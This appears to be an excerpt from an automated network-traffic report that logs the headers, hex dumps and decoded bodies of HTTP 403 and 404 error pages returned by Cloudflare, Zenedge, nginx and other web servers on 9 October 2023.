                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:52:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: 5a83378c-fe28-4508-9c9b-3f3da8dc5396CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c0v%2BRGdDZYa8vJBHEoyOPaUsh%2F1VpBCoCzpS2rSVmOwpvkwhcGgMaFD2Ttx8OYJZgA3Y8Do%2BmFNFN%2BvM%2F6jvv93NhWll5%2BFcIaHbwGfvBK1OI%2BvYiUkBa5wq3Ba87KzGHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=88.999748Server: cloudflareCF-RAY: 81371a4aedb42eed-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:12 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lC%2Fwb3tfqq6iX439h0Vn1IyVE5dDVPl98%2F68CkYnX75BGKbBw7QuEz%2FcPD9CAZB%2FXk%2FsDSxMKqtCTNydric25nINGUEvbsddTA92LUpk9jNUCIDgp4pcusOaGLl1GAUC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a4cfda70cb3-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Mon, 09 Oct 2023 13:52:12 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEX-Cache-Status: X-Zen-Fury: 91903f4d9bed11e761e07801a38805e5e5f799d9Data Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 33 31 37 31 22 2c 20 31 36 39 36 38 35 39 34 37 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 36 38 35 39 34 31 37 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 31 35 36 37 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 39 20 4f 63 74 20 32 30 32 33 20 31 33 3a 35 34 3a 31 32 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC3171", 1696859479, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1696859417 * 3.1415926535898; v = Math.floor(v); do
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:12 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oaKS1IhRHLFort3brHZc%2BDfCIqd3pOsHzOKdoQthIAhvfJYgVOixNDzCkrCemgzjzlvPPvxHX3kgo674fbX6w6ft%2BhbFQ7snjLYh%2FnuyKSo%2BcFc6MRYo9BhxZAj8TW9q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a4e5e740cb3-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 09 Oct 2023 13:52:12 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:13 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Mon, 09 Oct 2023 13:52:15 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: FjkJqjYE/wxpxOpBbData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RNU3U2X1a9nvdLpwn6vDSHsyjw2FcDmZWr1uiv2ZAvsFlPBtp0pADFyIz28R4jGUbjWIdzbyRUImbINscKFElTlPHHIK77dqStlyzDZjVO9B79qZsHO8KYKbz64J"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a632d4d7d43-LAXalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:52:31 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOC1mHrhbEkYEEB65baLeLYr%2FtrFt5pFo%2BSC5Xn0CO0rpG1xIZsNAI1HGUTl58UU0sahzquYJY%2FbPlOTTw8ykhyf7BjN51R61EDPOKdgKUPKq%2BH%2FY%2BNvvzA1gvZFX90%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a684a4c7d17-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Co
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 09 Oct 2023 13:52:17 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 